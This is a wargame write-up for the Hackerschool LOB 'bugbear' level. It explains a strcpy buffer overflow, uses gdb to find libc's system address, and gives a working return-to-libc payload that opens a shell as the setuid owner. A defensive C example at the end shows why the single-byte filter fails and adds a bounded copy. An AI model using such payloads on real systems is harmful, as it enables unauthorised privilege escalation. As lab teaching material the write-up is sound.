Hackerschool LOB LEVEL13 [darkknight -> bugbear] Write-up
M4ndU
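This is a write-up for Hackerschool LOB [darkknight -> bugbear].
Log in with the following credentials:
ID | darkknight
PW | new attacker
Use bash2 to avoid the bug where \xff is interpreted as \x00.
$ bash2
Then run
$ ls -l
to see which files and directories are present, and
$ cat [challenge name].c
to view the source code.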
login: darkknight
Password:
[darkknight@localhost darkknight]$ bash2
[darkknight@localhost darkknight]$ ls -l
total 16
-rwsr-sr-x 1 bugbear bugbear 12043 Mar 8 2010 bugbear
-rw-r--r-- 1 root root 385 Mar 29 2010 bugbear.c
[darkknight@localhost darkknight]$ cat bugbear.c
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
    char buffer[40];
    int i;
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    if(argv[1][47] == '\xbf')
    {
        printf("stack betrayed you!!\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}
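The return address cannot be pointed at the stack...
This time, it looks like the challenge is meant to be solved with the RTL (return-to-libc) technique.
We will use the system function. First, check the address of system.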
[darkknight@localhost darkknight]$ mkdir tmp
[darkknight@localhost darkknight]$ cp bugbear tmp/
[darkknight@localhost darkknight]$ cd tmp/
[darkknight@localhost tmp]$ gdb bugbear -q
(gdb) b main
Breakpoint 1 at 0x8048436
(gdb) r
Starting program: /home/darkknight/tmp/bugbear
Breakpoint 1, 0x8048436 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
./bugbear `python -c 'print "D"*44+"\xe0\x8a\x05\x40"+"argc"+"argv"+"/bin/sh"'`
[darkknight@localhost tmp]$ ./bugbear `python -c 'print "D"*44+"\xe0\x8a\x05\x40"+"argc"+"argv"+"/bin/sh"'`
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?@argcargv/bin/sh
Segmentation fault (core dumped)
[darkknight@localhost tmp]$ gdb -c core -q
Core was generated by `./bugbear DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?@argcargv/bin/sh'.
Program terminated with signal 11, Segmentation fault.
#0 0x63677261 in ?? ()
(gdb) x/10s $esp
0xbffffac4: "argv/bin/sh"
0xbffffad0: "\002"
0xbffffad2: ""
0xbffffad3: ""
0xbffffad4: "\200\203\004\b"
0xbffffad9: ""
0xbffffada: ""
0xbffffadb: ""
0xbffffadc: "?203\004\b0\204\004\b\002"
0xbffffae6: ""
(gdb) x/s $esp+4
0xbffffac8: "/bin/sh"
Found it!
[darkknight@localhost darkknight]$ ./bugbear `python -c 'print "D"*44+"\xe0\x8a\x05\x40"+"argc"+"\xc8\xfa\xff\xbf"+"/bin/sh"'`
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?@argc힐?bin/sh
bash$ my-pass
euid = 513
new divide
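As an added example (not part of the original write-up or the challenge source), the C code below shows why the \xbf check in bugbear.c does not address the root cause: an over-long argument whose byte 47 is not 0xbf passes the filter, while a length check before the copy rejects it. The names stack_filter_rejects, bounded_copy and demo are assumptions introduced for illustration, and the sample input is constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40  /* same size as buffer[] in bugbear.c */

/* The challenge's only check: reject input whose byte 47 (the top byte of
 * the saved return address on this little-endian target) is 0xbf, i.e. a
 * stack address. Returns 1 if the input is rejected. The length guard is
 * an addition; the original reads argv[1][47] unconditionally. */
static int stack_filter_rejects(const char *arg)
{
    return strlen(arg) > 47 && (unsigned char)arg[47] == 0xbf;
}

/* Hardened replacement for strcpy(buffer, argv[1]): refuse anything that
 * does not fit, including the terminating NUL. Returns 0 on success. */
static int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size)
        return -1;              /* would overflow: reject, do not truncate */
    memcpy(dst, src, len + 1);
    return 0;
}

/* Constructed sample: 47 filler bytes followed by 0x40, the top byte of
 * the libc address seen in the gdb session (0x40058ae0). */
static int demo(void)
{
    char input[49];
    char buffer[BUF_SIZE];

    memset(input, 'D', 47);
    input[47] = 0x40;
    input[48] = '\0';

    int filter = stack_filter_rejects(input);               /* 0: passes  */
    int copy = bounded_copy(buffer, sizeof buffer, input);  /* -1: refused */
    printf("filter rejects: %d, bounded_copy: %d\n", filter, copy);
    return filter == 0 && copy == -1;
}

int main(void)
{
    return demo() ? 0 : 1;
}
```

The filter is a blocklist on one byte of the overwritten return address; the bounded copy removes the overwrite itself, so no return address value matters.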